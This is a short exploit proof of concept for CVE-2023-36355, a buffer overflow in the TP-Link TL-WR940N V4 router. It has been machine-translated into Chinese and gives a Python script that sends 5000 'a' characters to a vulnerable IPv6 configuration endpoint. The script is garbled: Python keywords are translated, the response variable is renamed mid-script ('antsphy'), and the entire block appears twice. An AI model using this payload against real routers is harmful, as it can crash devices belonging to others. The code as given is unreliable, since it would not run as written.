#利用标题: TP-Link TL-WR940N V4-缓冲区溢出
#日期: 2023-06-30
#Country:伊朗
#利用作者: Amirhossein Bahramizadeh
#类别:硬件
#Dork : /userrpm /wandynamicipv6cfgrpm
#在: Windows/Linux上测试
#CVE : CVE-2023-36355
导入请求
#用路由器的IP替换IP地址
router_ip='192.168.0.1'
#用脆弱的端点和参数构建URL
url=f'http://{router_ip}/userrpm/wandynamicipv6cfgrpm?ipstart='
#用触发缓冲区溢出的手工有效载荷替换有效载荷
有效载荷='a' * 5000#示例有效载荷,根据需要调整长度
#通过精心设计的有效载荷发送GET请求
响应=requests.get(url +有效载荷)
#检查响应状态代码
if antsphy.status_code==200:
打印(“成功触发缓冲区溢出”)
其他:
打印(“缓冲区溢出未触发”)
#日期: 2023-06-30
#Country:伊朗
#利用作者: Amirhossein Bahramizadeh
#类别:硬件
#Dork : /userrpm /wandynamicipv6cfgrpm
#在: Windows/Linux上测试
#CVE : CVE-2023-36355
导入请求
#用路由器的IP替换IP地址
router_ip='192.168.0.1'
#用脆弱的端点和参数构建URL
url=f'http://{router_ip}/userrpm/wandynamicipv6cfgrpm?ipstart='
#用触发缓冲区溢出的手工有效载荷替换有效载荷
有效载荷='a' * 5000#示例有效载荷,根据需要调整长度
#通过精心设计的有效载荷发送GET请求
响应=requests.get(url +有效载荷)
#检查响应状态代码
if antsphy.status_code==200:
打印(“成功触发缓冲区溢出”)
其他:
打印(“缓冲区溢出未触发”)
